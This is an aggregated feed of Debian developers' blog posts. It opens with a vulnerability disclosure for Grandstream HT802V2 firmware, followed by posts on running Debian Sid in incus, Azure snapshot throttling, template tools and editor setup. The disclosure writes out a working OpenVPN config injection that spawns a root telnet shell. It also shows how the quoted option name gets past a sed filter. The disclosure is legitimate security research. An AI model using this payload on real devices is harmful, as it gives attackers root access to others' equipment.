Evgeni Golov: Authenticated RCE via OpenVPN Configuration File in Grandstream HT802V2 and probably others

I have a Grandstream HT802V2 running firmware 1.0.3.5 and while playing around with the VPN settings realized that the sanitization of the "Additional Options" field done for CVE-2020-5739 is not sufficient. Before the fix for CVE-2020-5739, /etc/rc.d/init.d/openvpn did
echo "$(nvram get 8460)"   sed 's/;/\n/g' >> $ CONF_FILE 
After the fix it does
echo "$(nvram get 8460)"   sed -e 's/;/\n/g'   sed -e '/script-security/d' -e '/^[ ]*down /d' -e '/^[ ]*up /d' -e '/^[ ]*learn-address /d' -e '/^[ ]*tls-verify /d' -e '/^[ ]*client-[dis]*connect /d' -e '/^[ ]*route-up/d' -e '/^[ ]*route-pre-down /d' -e '/^[ ]*auth-user-pass-verify /d' -e '/^[ ]*ipchange /d' >> $ CONF_FILE 
That means it deletes all lines that either contain script-security or start with a set of options that allow command execution. Looking at the OpenVPN configuration template (/etc/openvpn/openvpn.conf), it already uses up and therefor sets script-security 2, so injecting that is unnecessary. Thus if one can somehow inject "/bin/ash -c 'telnetd -l /bin/sh -p 1271'" in one of the command-executing options, a reverse shell will be opened. The filtering looks for lines that start with zero or more occurrences of a space, followed by the option name (up, down, etc), followed by another space. While OpenVPN happily accepts tabs instead of spaces in the configuration file, I wasn't able to inject a tab neither via the web interface, nor via SSH/gs_config. However, OpenVPN also allows quoting, which is only documented for parameters, but works just well for option names too. That means that instead of
up "/bin/ash -c 'telnetd -l /bin/sh -p 1271'"
from the original exploit by Tenable, we write
"up" "/bin/ash -c 'telnetd -l /bin/sh -p 1271'"
this still will be a valid OpenVPN configuration statement, but the filtering in /etc/rc.d/init.d/openvpn won't catch it and the resulting OpenVPN configuration will include the exploit:
# grep -E '(up script-security)' /etc/openvpn.conf
up /etc/openvpn/openvpn.up
up-restart
;group nobody
script-security 2
"up" "/bin/ash -c 'telnetd -l /bin/sh -p 1271'"
And with that, once the OpenVPN connection is established, a reverse shell is spawned:
/ # uname -a
Linux HT8XXV2 4.4.143 #108 SMP PREEMPT Mon May 13 18:12:49 CST 2024 armv7l GNU/Linux
/ # id
uid=0(root) gid=0(root)
Affected devices Fix After disclosing this issue to Grandstream, they have issued a new firmware release (1.0.3.10) which modifies the filtering to the following:
echo "$(nvram get 8460)"   sed -e 's/;/\n/g' \
                           sed -e '/script-security/d' \
                               -e '/^["'\'' \f\v\r\n\t]*down["'\'' \f\v\r\n\t]/d' \
                               -e '/^["'\'' \f\v\r\n\t]*up["'\'' \f\v\r\n\t]/d' \
                               -e '/^["'\'' \f\v\r\n\t]*learn-address["'\'' \f\v\r\n\t]/d' \
                               -e '/^["'\'' \f\v\r\n\t]*tls-verify["'\'' \f\v\r\n\t]/d' \
                               -e '/^["'\'' \f\v\r\n\t]*tls-crypt-v2-verify["'\'' \f\v\r\n\t]/d' \
                               -e '/^["'\'' \f\v\r\n\t]*client-[dis]*connect["'\'' \f\v\r\n\t]/d' \
                               -e '/^["'\'' \f\v\r\n\t]*route-up["'\'' \f\v\r\n\t]/d' \
                               -e '/^["'\'' \f\v\r\n\t]*route-pre-down["'\'' \f\v\r\n\t]/d' \
                               -e '/^["'\'' \f\v\r\n\t]*auth-user-pass-verify["'\'' \f\v\r\n\t]/d' \
                               -e '/^["'\'' \f\v\r\n\t]*ipchange["'\'' \f\v\r\n\t]/d' >> $ CONF_FILE 
So far I was unable to inject any further commands in this block. Timeline

1 February 2025

Guido G nther: Free Software Activities January 2025

Another short status update of what happened on my side last month. Mostly focused on quality of life improvements in phosh and cleaning up and improving phoc this time around (including catching up with wlroots git) but some improvements for other things like phosh-osk-stub happened on the side line too. phosh phoc phosh-osk-stub xdg-desktop-portal-phosh phosh-recipes libcmatrix phrog Debian git-buildpackage livi feedbackd Wayland protocols Wlroots Bug reports Reviews This is not code by me but reviews on other peoples code. The list is incomplete, but I hope to improve on this in the upcoming months. Thanks for the contributions! Help Development If you want to support my work see donations. Comments? Join the Fediverse thread

27 January 2025

Sergio Talens-Oliag: Running a Debian Sid on Ubuntu

Although I am a Debian Developer (not very active, BTW) I am using Ubuntu LTS (right now version 24.04.1) on my main machine; it is my work laptop and I was told to keep using Ubuntu on it when it was assigned to me, although I don t believe it is really necessary or justified (I don t need support, I don t provide support to others and I usually test my shell scripts on multiple systems if needed anyway). Initially I kept using Debian Sid on my personal laptop, but I gave it to my oldest son as the one he was using (an old Dell XPS 13) was stolen from him a year ago. I am still using Debian stable on my servers (one at home that also runs LXC containers and another one on an OVH VPS), but I don t have a Debian Sid machine anymore and while I could reinstall my work machine, I ve decided I m going to try to use a system container to run Debian Sid on it. As I want to use a container instead of a VM I ve narrowed my options to lxc or systemd-nspawn (I have docker and podman installed, but I don t believe they are good options for running system containers). As I will want to take snapshots of the container filesystem I ve decided to try incus instead of systemd-nspawn (I already have experience with it and while it works well it has less features than incus).

Installing incusAs this is a personal system where I want to try things, instead of using the packages included with Ubuntu I ve decided to install the ones from the zabbly incus stable repository. To do it I ve executed the following as root:
# Get the zabbly repository GPG key
curl -fsSL https://pkgs.zabbly.com/key.asc -o /etc/apt/keyrings/zabbly.asc
# Create the zabbly-incus-stable.sources file
sh -c 'cat <<EOF > /etc/apt/sources.list.d/zabbly-incus-stable.sources
Enabled: yes
Types: deb
URIs: https://pkgs.zabbly.com/incus/stable
Suites: $(. /etc/os-release && echo $ VERSION_CODENAME )
Components: main
Architectures: $(dpkg --print-architecture)
Signed-By: /etc/apt/keyrings/zabbly.asc
EOF'
Initially I only plan to use the command line tools, so I ve installed the incus and the incus-extra packages, but once things work I ll probably install the incus-ui-canonical package too, at least for testing it:
apt update
apt install incus incus-extra

Adding my personal user to the incus-admin groupTo be able to run incus commands as my personal user I ve added it to the incus-admin group:
sudo adduser "$(id -un)" incus-admin
And I ve logged out and in again of my desktop session to make the changes effective.

Initializing the incus environmentTo configure the incus environment I ve executed the incus admin init command and accepted the defaults for all the questions, as they are good enough for my current use case.

Creating a Debian containerTo create a Debian container I ve used the default debian/trixie image:
incus launch images:debian/trixie debian
This command downloads the image and creates a container named debian using the default profile. The exec command can be used to run a root login shell inside the container:
incus exec debian -- su -l
Instead of exec we can use the shell alias:
incus shell debian
which does the same as the previous command. Inside that shell we can try to update the machine to sid changing the /etc/apt/sources.list file and using apt:
root@debian:~# echo "deb http://deb.debian.org/debian sid main contrib non-free" \
  >/etc/apt/sources.list
root@debian:~# apt update
root@debian:~# apt dist-upgrade
As my machine has docker installed the apt update command fails because the network does not work, to fix it I ve executed the commands of the following section and re-run the apt update and apt dist-upgrade commands.

Making the incusbr0 bridge work with DockerTo avoid problems with docker networking we have to add rules for the incusbr0 bridge to the DOCKER-USER chain as follows:
sudo iptables -I DOCKER-USER -i incusbr0 -j ACCEPT
sudo iptables -I DOCKER-USER -o incusbr0 -m conntrack \
  --ctstate RELATED,ESTABLISHED -j ACCEPT
That makes things work now, but to make things persistent across reboots we need to add them each time the machine boots. As suggested by the incus documentation I ve installed the iptables-persistent package (my command also purges the ufw package, as I was not using it) and saved the current rules when installing:
sudo apt install iptables-persistent --purge

Integrating the DNS resolution of the container with the hostTo make DNS resolution for the ictus containers work from the host I ve followed the incus documentation. To set up things manually I ve run the following:
br="incusbr0";
br_ipv4="$(incus network get "$br" ipv4.address)";
br_domain="$(incus network get "$br" dns.domain)";
dns_address="$ br_ipv4%/* ";
dns_domain="$ br_domain:=incus ";
resolvectl dns "$br" "$ dns_address ";
resolvectl domain "$br" "~$ dns_domain ";
resolvectl dnssec "$br" off;
resolvectl dnsovertls "$br" off;
And to make the changes persistent across reboots I ve created the following service file:
sh -c "cat <<EOF   sudo tee /etc/systemd/system/incus-dns-$ br .service
[Unit]
Description=Incus per-link DNS configuration for $ br 
BindsTo=sys-subsystem-net-devices-$ br .device
After=sys-subsystem-net-devices-$ br .device
[Service]
Type=oneshot
ExecStart=/usr/bin/resolvectl dns $ br  $ dns_address 
ExecStart=/usr/bin/resolvectl domain $ br  ~$ dns_domain 
ExecStart=/usr/bin/resolvectl dnssec $ br  off
ExecStart=/usr/bin/resolvectl dnsovertls $ br  off
ExecStopPost=/usr/bin/resolvectl revert $ br 
RemainAfterExit=yes
[Install]
WantedBy=sys-subsystem-net-devices-$ br .device
EOF"
And enabled it:
sudo systemctl daemon-reload
sudo systemctl enable --now incus-dns-$ br .service
If all goes well the DNS resolution works from the host:
$ host debian.incus
debian.incus has address 10.149.225.121
debian.incus has IPv6 address fd42:1178:afd8:cc2c:216:3eff:fe2b:5cea

Using my host user and home dir inside the containerTo use my host user and home directory inside the container I need to add the user and group to the container. First I ve added my user group with the same GID used on the host:
incus exec debian -- addgroup --gid "$(id --group)" --allow-bad-names \
  "$(id --group --name)"
Once I have the group I ve added the user with the same UID and GID as on the host, without defining a password for it:
incus exec debian -- adduser --uid "$(id --user)" --gid "$(id --group)" \
  --comment "$(getent passwd "$(id --user -name)"   cut -d ':' -f 5)" \
  --no-create-home --disabled-password --allow-bad-names \
  "$(id --user --name)"
Once the user is created we can mount the home directory on the container (we add the shift option to make the container use the same UID and GID as we do on the host):
incus config device add debian home disk source=$HOME path=$HOME shift=true
We have the shell alias to log with the root account, now we can add another one to log into the container using the newly created user:
incus alias add ush "exec @ARGS@ -- su -l $(id --user --name)"
To log into the container as our user now we just need to run:
incus ush debian
To be able to use sudo inside the container we could add our user to the sudo group:
incus exec debian -- adduser "$(id --user --name)" "sudo"
But that requires a password and we don t have one, so instead we are going to add a file to the /etc/sudoers.d directory to allow our user to run sudo without a password:
incus exec debian -- \
  sh -c "echo '$(id --user --name) ALL = NOPASSWD: ALL' /etc/sudoers.d/user"

Accessing the container using sshTo use the container as a real machine and log into it as I do on remote machines I ve installed the openssh-server and authorized my laptop public key to log into my laptop (as we are mounting the home directory from the host that allows us to log in without password from the local machine). Also, to be able to run X11 applications from the container I ve adusted the $HOME/.ssh/config file to always forward X11 (option ForwardX11 yes for Host debian.incus) and installed the xauth package. After that I can log into the container running the command ssh debian.incus and start using it after installing other interesting tools like neovim, rsync, tmux, etc.

Taking snapshots of the containerAs this is a system container we can take snapshots of it using the incus snapshot command; that can be specially useful to take snapshots before doing a dist-upgrade so we can rollback if something goes wrong. To work with container snapshots we run use the incus snapshot command, i.e. to create a snapshot we use de create subcommand:
incus snapshot create debian
The snapshot sub commands include options to list the available snapshots, restore a snapshot, delete a snapshot, etc.

ConclusionSince last week I have a terminal running a tmux session on the Debian Sid container with multiple zsh windows open (I ve changed the prompt to be able to notice easily where I am) and it is working as expected. My plan now is to add some packages and use the container for personal projects so I can work on a Debian Sid system without having to reinstall my work machine. I ll probably write more about it in the future, but for now, I m happy with the results.

18 January 2025

Dominique Dumont: How we solved storage API throttling on our Azure Kubernetes clusters

Hi This issue was quite puzzling, so I m sharing how we investigated this issue. I hope it can be useful for you. My client informed me that he was no longer able to install new instances of his application. k9s showed that only some pods could not be created, only the ones that created physical volume (PV). The description of these pods showed a HTTP error 429 when creating pods: New PVC could not be created because we were throttled by Azure storage API. This issue was confirmed by Azure diagnostic console on Kubernetes ( menu Diagnose and solve problems Cluster and Control Plane Availability and Performance Azure Resource Request Throttling ). We had a lot of throttling:
2025-01-18_11-01-k8s-throttles.png
Which were explained by the high call rate:
2025-01-18_11-01-k8s-calls.png
The first clue was found at the bottom of Azure diagnostic page:
2025-01-18_11-27-throttles-by-user-agent.png
According, to this page, throttling is done by services whose user agent is:
Go/go1.23.1 (amd64-linux) go-autorest/v14.2.1 Azure-SDK-For-Go/v68.0.0
storage/2021-09-01microsoft.com/aks-operat azsdk-go-armcompute/v1.0.0 (go1.22.3; linux)
The main information is Azure-SDK-For-Go, which means the program making all these calls to storage API is written in Go. All our services are written in Typescript or Rust, so they are not suspect. That leaves controllers running in kube-systems namespace. I could not find anything suspects in the logs of these services. At that point I was convinced that a component in Kubernetes control plane was making all those calls. Unfortunately, AKS is managed by Microsoft and I don t have access to the control plane logs. However, we re realized that we had quite a lot of volumesnapshots that are created in our clusters using k8s-scheduled-volume-snapshotter: We suspected that kubernetes reconciliation loop is throttled when checking the status of all these snapshots. May be so, but we also had the same issues and throttle rates on preprod and prod were the number of snapshots were quite different. We tried to get more information using Azure console on our snapshot account, but it was also broken by the throttling issue. We were so puzzled that we decided to try L odagan s advice (tout cr mer pour repartir sur des bases saines, loosely translated as burn everything down to start from scratch ) and we destroyed piece by piece our dev cluster while checking if the throttling stopped. First, we removed all our applications, no change. Then, all ancillary components like rabbitmq, cert-manager were removed, no change. Then, we tried remove the namespace containing our applications. But, we faced another issue: Kubernetes was unable to remove the namespace because it could not destroy some PVC and volumesnapshots. That was actually good news, because it meant that we were close to the actual issue. We managed to destroy the PVC and volumesnapshots by removing their finalizers. Finalizers are some kind of markers that tell kubernetes that something needs to be done before actually deleting a resource. The finalizers were removed with a command like:
kubectl patch volumesnapshots $ volumesnapshot  \
  -p ' \"metadata\": \"finalizers\":null '  --type merge
Then, we got the first progress : the throttling and high call rate stopped on our dev cluster. To make sure that the snapshots were the issue, we re-installed the ancillary components and our applications. Everything was copacetic. So, the problem was indeed with PVC and snapshots. Even though we have backups outside of Azure, we weren t really thrilled at trying L odagan s method on our prod cluster So we looked for a better fix to try on our preprod cluster. Poking around in PVC and volumesnapshots, I finally found this error message in the description on a volumesnapshotcontents:
Code="ShareSnapshotCountExceeded" Message="The total number of snapshots
for the share is over the limit."
The number of snapshots found in our cluster was not that high. So I wanted to check the snapshots present in our storage account using Azure console, which was still broken. Fortunately, Azure CLI is able to retry HTTP calls when getting 429 errors. I managed to get a list of snapshots with
az storage share list --account-name [redacted] --include-snapshots \
      tee preprod-list.json
There, I found a lot of snapshots dating back from 2024. These were no longer managed by Kubernetes and should have been cleaned up. That was our smoking gun. I guess that we had a chain of events like: To make things worse, k8s-scheduled-volume-snapshotter creates new snapshots when it cannot list the old ones. So we had 4 new snapshots per day instead of one. Since we had the chain of events, fixing the issue was not too difficult (but quite long ):
  1. stop k8s-scheduled-volume-snapshotter by disabling its cron job
  2. delete all volumesnapshots and volume snapshots contents from k8s.
  3. since Azure API was throttled, we also had to remove their finalizers
  4. delete all snapshots from azure using az command and a Perl script (this step took several hours)
  5. re-enable k8s-scheduled-volume-snapshotter
After these steps, preprod was back to normal. I m now applying the same recipe on prod. We still don t know why we had all these stale snapshots. It may have been a human error or a bug in k8s-scheduled-volume-snapshotter. Anyway, to avoid this problem is the future, we will: My name is Dominique Dumont, I m a devops freelance. You can find the devops and audit services I propose on my website or reach out to me on LinkedIn. All the best

16 January 2025

Sergio Talens-Oliag: Command line tools to process templates

I ve always been a fan of template engines that work with text files, mainly to work with static site generators, but also to generate code, configuration files, and other text-based files. For my own web projects I used to go with Jinja2, as all my projects were written in Python, while for static web sites I used the template engines included with the tools I was using, i.e. Liquid with Jekyll and Go Templates (based on the text/template and the html/template go packages) for Hugo. When I needed to generate code snippets or configuration files from shell scripts I used to go with sed and/or envsubst, but lately things got complicated and I started to use a command line application called tmpl that uses the Go Template Language with functions from the Sprig library.

tmplI ve been using my fork of the tmpl program to process templates on CI/CD pipelines (gitlab-ci) to generate configuration files and code snippets because it uses the same syntax used by helm (easier to use by other DevOps already familiar with the format) and the binary is small and can be easily included into the docker images used by the pipeline jobs. One interesting feature of the tmpl tool is that it can read values from command line arguments and from multiple files in different formats (YAML, JSON, TOML, etc) and merge them into a single object that can be used to render the templates. There are alternatives to the tmpl tool and I ve looked at them (i.e. simple ones like go-template-cli or complex ones like gomplate), but I haven t found one that fits my needs. For my next project I plan to evaluate a move to a different tool or template format, as tmpl is not being actively maintained (as I said, I m using my own fork) and it is not included on existing GNU/Linux distributions (I packaged it for Debian and Alpine, but I don t want to maintain something like that without an active community and I m not interested in being the upstream myself, as I m trying to move to Rust instead of Go as the compiled programming language for my projects).

Mini JinjaLooking for alternate tools to process templates on the command line I found the minijinja rust crate, a minimal implementation of the Jinja2 template engine that also includes a small command line utility (minijinja-cli) and I believe I ll give it a try on the future for various reasons:
  • I m already familiar with the Jinja2 syntax and it is widely used on the industry.
  • On my code I can use the original Jinja2 module for Python projects and MiniJinja for Rust programs.
  • The included command line utility is small and easy to use, and the binaries distributed by the project are good enough to add them to the docker container images used by CI/CD pipelines.
  • As I want to move to Rust I can try to add functionalities to the existing command line client or create my own version of it if they are needed (don t think so, but who knows).

10 January 2025

Sergio Talens-Oliag: Testing New User Tools

On recent weeks I ve had some time to scratch my own itch on matters related to tools I use daily on my computer, namely the desktop / window manager and my text editor of choice. This post is a summary of what I tried, how it worked out and my short and medium-term plans related to them.

Desktop / WMOn the desktop / window manager front I ve been using Cinnamon on Debian and Ubuntu systems since Gnome 3 was published (I never liked version 3, so I decided to move to something similar to Gnome 2, including the keyboard shortcuts). In fact I ve never been a fan of Desktop environments, before Gnome I used OpenBox and IceWM because they where a lot faster than desktop systems on my hardware at the time and I was using them only to place one or two windows on multiple workspaces using mainly the keyboard for my interactions (well, except for the web browsers and the image manipulation programs). Although I was comfortable using Cinnamon, some years ago I tried to move to i3, a tilling window manager for X11 that looked like a good choice for me, but I didn t have much time to play with it and never used it enough to make me productive with it (I didn t prepare a complete configuration nor had enough time to learn the new shortcuts, so I went back to Cinnamon and never tried again). Anyway, some weeks ago I updated my work machine OS (it was using Ubuntu 22.04 LTS and I updated it to the 24.04 LTS version) and the Cinnamon systray applet stopped working as it used to do (in fact I still have to restart Cinnamon after starting a session to make it work) and, as I had some time, I decided to try a tilling window manager again, but now I decided to go for SwayWM, as it uses Wayland instead of X11.

Sway configurationOn my ~/.config/sway/config I tuned some things:
  • Set fuzzel as the application launcher.
  • Installed manually the shikane application and created a configuration to be executed always when sway is started / reloaded (I adjusted my configuration with wdisplays and used shikanectl to save it).
  • Added support for running the xdg-desktop-portal-wlr service.
  • Enabled the swayidle command to lock the screen after some time of inactivity.
  • Adjusted the keyboard to use the es key map
  • Added some keybindings to make my life easier, including the use of grimm and swappy to take screenshots
  • Configured waybar as the environment bar.
  • Added a shell script to start applications when sway is started (it uses swaymsg to execute background commands and the i3toolwait script to wait for the
    #!/bin/sh
    # VARIABLES
    CHROMIUM_LOCAL_STATE="$HOME/.config/google-chrome/Local State"
    I3_TOOLWAIT="$HOME/.config/sway/scripts/i3-toolwait"
    # Functions
    chromium_profile_dir()  
      jq -r ".profile.info_cache to_entries map( (.value.name): .key ) add .\"$1\" // \"\"" "$CHROMIUM_LOCAL_STATE"
     
    # MAIN
    IGZ_PROFILE_DIR="$(chromium_profile_dir "sergio.talens@intelygenz.com")"
    OURO_PROFILE_DIR="$(chromium_profile_dir "sergio.talens@nxr.global")"
    PERSONAL_PROFILE_DIR="$(chromium_profile_dir "stalens@gmail.com")"
    # Common programs
    swaymsg "exec nextcloud --background"
    swaymsg "exec nm-applet"
    # Run spotify on the first workspace (it is mapped to the laptop screen)
    swaymsg -q "workspace 1"
    $ I3_TOOLWAIT  "spotify"
    # Run tmux on the
    swaymsg -q "workspace 2"
    $ I3_TOOLWAIT  -- foot tmux a -dt sto
    wp_num="3"
    if [ "$OURO_PROFILE_DIR" ]; then
      swaymsg -q "workspace $wp_num"
      $ I3_TOOLWAIT  -m ouro-browser -- google-chrome --profile-directory="$OURO_PROFILE_DIR"
      wp_num="$((wp_num+1))"
    fi
    if [ "$IGZ_PROFILE_DIR" ]; then
      swaymsg -q "workspace $wp_num"
      $ I3_TOOLWAIT  -m igz-browser -- google-chrome --profile-directory="$IGZ_PROFILE_DIR"
      wp_num="$((wp_num+1))"
    fi
    if [ "$PERSONAL_PROFILE_DIR" ]; then
      swaymsg -q "workspace $wp_num"
      $ I3_TOOLWAIT  -m personal-browser -- google-chrome --profile-directory="$PERSONAL_PROFILE_DIR"
      wp_num="$((wp_num+1))"
    fi
    # Open the browser without setting the profile directory if none was found
    if [ "$wp_num" = "3" ]; then
      swaymsg -q "workspace $wp_num"
      $ I3_TOOLWAIT  google-chrome
      wp_num="$((wp_num+1))"
    fi
    swaymsg -q "workspace $wp_num"
    $ I3_TOOLWAIT  evolution
    wp_num="$((wp_num+1))"
    swaymsg -q "workspace $wp_num"
    $ I3_TOOLWAIT  slack
    wp_num="$((wp_num+1))"
    # Open a private browser and a console in the last workspace
    swaymsg -q "workspace $wp_num"
    $ I3_TOOLWAIT  -- google-chrome --incognito
    $ I3_TOOLWAIT  foot
    # Go back to the second workspace for keepassxc
    swaymsg "workspace 2"
    $ I3_TOOLWAIT  keepassxc

ConclusionAfter using Sway for some days I can confirm that it is a good choice for me, but some of the components needed to make it work as I want are too new and not available on the Ubuntu 24.04 LTS repositories, so I decided to go back to Cinnamon and try Sway again in the future, although I added more workspaces to my setup (now they are only available on the main monitor, the laptop screen is fixed while there is a big monitor connected), added some additional keyboard shortcuts and installed or updated some applets.

Text editorWhen I started using Linux many years ago I used vi/vim and emacs as my text editors (vi for plain text and emacs for programming and editing HTML/XML), but eventually I moved to vim as my main text editor and I ve been using it since (well, I moved to neovim some time ago, although I kept my old vim configuration). To be fair I m not as expert as I could be with vim, but I m productive with it and it has many plugins that make my life easier on my machines, while keeping my ability to edit text and configurations on any system that has a vi compatible editor installed. For work reasons I tried to use Visual Studio Code last year, but I ve never really liked it and almost everything I do with it I can do with neovim (i. e. I even use copilot with it). Besides, I m a heavy terminal user (I use tmux locally and via ssh) and I like to be able to use my text editor on my shell sessions, and code does not work like that. The only annoying thing about vim/neovim is its configuration (well, the problem is that I have a very old one and probably should spend some time fixing and updating it), but, as I said, it s been working well for me for a long time, so I never really had the motivation to do it. Anyway, after finishing my desktop tests I saw that I had the Helix editor installed for some time but I never tried it, so I decided to give it a try and see if it could be a good replacement for neovim on my environments (the only drawback is that as it is not vi compatible, I would need to switch back to vi mode when working on remote systems, but I guess I could live with that). I ran the helix tutorial and I liked it, so I decided to configure and install the Language Servers I can probably take advantage of on my daily work on my personal and work machines and see how it works.

Language server installationsA lot of manual installations are needed to get the language servers working what I did on my machines is more or less the following:
# AWK
sudo npm i -g 'awk-language-server@>=0.5.2'
# BASH
sudo apt-get install shellcheck shfmt
sudo npm i -g bash-language-server
# C/C++
sudo apt-get install clangd
# CSS, HTML, ESLint, JSON, SCS
sudo npm i -g vscode-langservers-extracted
# Docker
sudo npm install -g dockerfile-language-server-nodejs
# Docker compose
sudo npm install -g @microsoft/compose-language-service
# Helm
app="helm_ls_linux_amd64"
url="$(
  curl -s https://api.github.com/repos/mrjosh/helm-ls/releases/latest  
    jq -r ".assets[]   select(.name == \"$app\")   .browser_download_url"
)"
curl -L "$url" --output /tmp/helm_ls
sudo install /tmp/helm_ls /usr/local/bin
rm /tmp/helm_ls
# Markdown
app="marksman-linux-x64"
url="$(
  curl -s https://api.github.com/repos/artempyanykh/marksman/releases/latest  
    jq -r ".assets[]   select(.name == \"$app\")   .browser_download_url"
)"
curl -L "$url" --output /tmp/marksman
sudo install /tmp/marksman /usr/local/bin
rm /tmp/marksman
# Python
sudo npm i -g pyright
# Rust
rustup component add rust-analyzer
# SQL
sudo npm i -g sql-language-server
# Terraform
sudo apt-get install terraform-ls
# TOML
cargo install taplo-cli --locked --features lsp
# YAML
sudo npm install --global yaml-language-server
# JavaScript, TypeScript
sudo npm install -g typescript-language-server typescript
sudo npm install -g --save-dev --save-exact @biomejs/biome

Helix configurationThe helix configuration is done on a couple of toml files that are placed on the ~/.config/helix directory, the config.toml file I used is this one:
theme = "solarized_light"
[editor]
line-number = "relative"
mouse = false
[editor.statusline]
left = ["mode", "spinner"]
center = ["file-name"]
right = ["diagnostics", "selections", "position", "file-encoding", "file-line-ending", "file-type"]
separator = " "
mode.normal = "NORMAL"
mode.insert = "INSERT"
mode.select = "SELECT"
[editor.cursor-shape]
insert = "bar"
normal = "block"
select = "underline"
[editor.file-picker]
hidden = false
[editor.whitespace]
render = "all"
[editor.indent-guides]
render = true
character = " " # Some characters that work well: " ", " ", " ", " "
skip-levels = 1
And to configure the language servers I used the following language-servers.toml file:
[[language]]
name = "go"
auto-format = true
formatter =   command = "goimports"  
[[language]]
name = "javascript"
language-servers = [
  "typescript-language-server", # optional
  "vscode-eslint-language-server",
]
[language-server.rust-analyzer.config.check]
command = "clippy"
[language-server.sql-language-server]
command = "sql-language-server"
args = ["up", "--method", "stdio"]
[[language]]
name = "sql"
language-servers = [ "sql-language-server" ]
[[language]]
name = "hcl"
language-servers = [ "terraform-ls" ]
language-id = "terraform"
[[language]]
name = "tfvars"
language-servers = [ "terraform-ls" ]
language-id = "terraform-vars"
[language-server.terraform-ls]
command = "terraform-ls"
args = ["serve"]
[[language]]
name = "toml"
formatter =   command = "taplo", args = ["fmt", "-"]  
[[language]]
name = "typescript"
language-servers = [
  "typescript-language-server",
  "vscode-eslint-language-server",
]

Neovim configurationAfter a little while I noticed that I was going to need some time to get used to helix and the most interesting thing for me was the easy configuration and the language server integrations, but as I am already comfortable with neovim and just had installed the language server support tools on my machines I just need to configure them for neovim and I can keep using it for a while. As I said my configuration is old, to configure neovim I have the following init.vim file on my ~/.config/nvim folder:
set runtimepath^=~/.vim runtimepath+=~/.vim/after
let &packpath=&runtimepath
source ~/.vim/vimrc
" load lua configuration
lua require('config')
With that configuration I keep my old vimrc (it is a little bit messy, but it works) and I use a lua configuration file for the language servers and some additional neovim plugins on the ~/.config/nvim/lua/config.lua file:
-- -----------------------
-- BEG: LSP Configurations
-- -----------------------
-- AWS (awk_ls)
require'lspconfig'.awk_ls.setup 
-- Bash (bashls)
require'lspconfig'.bashls.setup 
-- C/C++ (clangd)
require'lspconfig'.clangd.setup 
-- CSS (cssls)
require'lspconfig'.cssls.setup 
-- Docker (dockerls)
require'lspconfig'.dockerls.setup 
-- Docker Compose
require'lspconfig'.docker_compose_language_service.setup 
-- Golang (gopls)
require'lspconfig'.gopls.setup 
-- Helm (helm_ls)
require'lspconfig'.helm_ls.setup 
-- Markdown
require'lspconfig'.marksman.setup 
-- Python (pyright)
require'lspconfig'.pyright.setup 
-- Rust (rust-analyzer)
require'lspconfig'.rust_analyzer.setup 
-- SQL (sqlls)
require'lspconfig'.sqlls.setup 
-- Terraform (terraformls)
require'lspconfig'.terraformls.setup 
-- TOML (taplo)
require'lspconfig'.taplo.setup 
-- Typescript (ts_ls)
require'lspconfig'.ts_ls.setup 
-- YAML (yamlls)
require'lspconfig'.yamlls.setup 
  settings =  
    yaml =  
      customTags =   "!reference sequence"  
     
   
 
-- -----------------------
-- END: LSP Configurations
-- -----------------------
-- ---------------------------------
-- BEG: Autocompletion configuration
-- ---------------------------------
-- Ref: https://github.com/neovim/nvim-lspconfig/wiki/Autocompletion
--
-- Pre requisites:
--
--   # Packer
--   git clone --depth 1 https://github.com/wbthomason/packer.nvim \
--      ~/.local/share/nvim/site/pack/packer/start/packer.nvim
--
--   # Start nvim and run :PackerSync or :PackerUpdate
-- ---------------------------------
local use = require('packer').use
require('packer').startup(function()
  use 'wbthomason/packer.nvim' -- Packer, useful to avoid removing it with PackerSync / PackerUpdate
  use 'neovim/nvim-lspconfig' -- Collection of configurations for built-in LSP client
  use 'hrsh7th/nvim-cmp' -- Autocompletion plugin
  use 'hrsh7th/cmp-nvim-lsp' -- LSP source for nvim-cmp
  use 'saadparwaiz1/cmp_luasnip' -- Snippets source for nvim-cmp
  use 'L3MON4D3/LuaSnip' -- Snippets plugin
end)
-- Add additional capabilities supported by nvim-cmp
local capabilities = require("cmp_nvim_lsp").default_capabilities()
local lspconfig = require('lspconfig')
-- Enable some language servers with the additional completion capabilities offered by nvim-cmp
local servers =   'clangd', 'rust_analyzer', 'pyright', 'ts_ls'  
for _, lsp in ipairs(servers) do
  lspconfig[lsp].setup  
    -- on_attach = my_custom_on_attach,
    capabilities = capabilities,
   
end
-- luasnip setup
local luasnip = require 'luasnip'
-- nvim-cmp setup
local cmp = require 'cmp'
cmp.setup  
  snippet =  
    expand = function(args)
      luasnip.lsp_expand(args.body)
    end,
   ,
  mapping = cmp.mapping.preset.insert( 
    ['<C-u>'] = cmp.mapping.scroll_docs(-4), -- Up
    ['<C-d>'] = cmp.mapping.scroll_docs(4), -- Down
    -- C-b (back) C-f (forward) for snippet placeholder navigation.
    ['<C-Space>'] = cmp.mapping.complete(),
    ['<CR>'] = cmp.mapping.confirm  
      behavior = cmp.ConfirmBehavior.Replace,
      select = true,
     ,
    ['<Tab>'] = cmp.mapping(function(fallback)
      if cmp.visible() then
        cmp.select_next_item()
      elseif luasnip.expand_or_jumpable() then
        luasnip.expand_or_jump()
      else
        fallback()
      end
    end,   'i', 's'  ),
    ['<S-Tab>'] = cmp.mapping(function(fallback)
      if cmp.visible() then
        cmp.select_prev_item()
      elseif luasnip.jumpable(-1) then
        luasnip.jump(-1)
      else
        fallback()
      end
    end,   'i', 's'  ),
   ),
  sources =  
      name = 'nvim_lsp'  ,
      name = 'luasnip'  ,
   ,
 
-- ---------------------------------
-- END: Autocompletion configuration
-- ---------------------------------

ConclusionI guess I ll keep helix installed and try it again on some of my personal projects to see if I can get used to it, but for now I ll stay with neovim as my main text editor and learn the shortcuts to use it with the language servers.

1 January 2025

Guido G nther: Free Software Activities December 2024

Another short status update of what happened on my side last month. The larger blocks are the Phosh 0.44 release and landing the initial Cell Broadcast support in phosh. The rest is all just small bits of bug, fallout/regression fixing here and there. phosh phoc phosh-mobile-settings libphosh-rs phosh-osk-stub phosh-tour pfs xdg-desktop-portal-phosh phog Debian git-buildpackage wlr-randr python-dbusmock livi Chatty feedbackd libadwaita phosh-ev Reviews This is not code by me but reviews on other peoples code. The list is incomplete, but I hope to improve on this in the upcoming months. Thanks for the contributions! Help Development Thanks a lot to all the those who supported my work on this in 2024. Happy new year! If you want to support my work see donations. Comments? Join the Fediverse thread

26 December 2024

Kentaro Hayashi: How to check what matches linux-any?

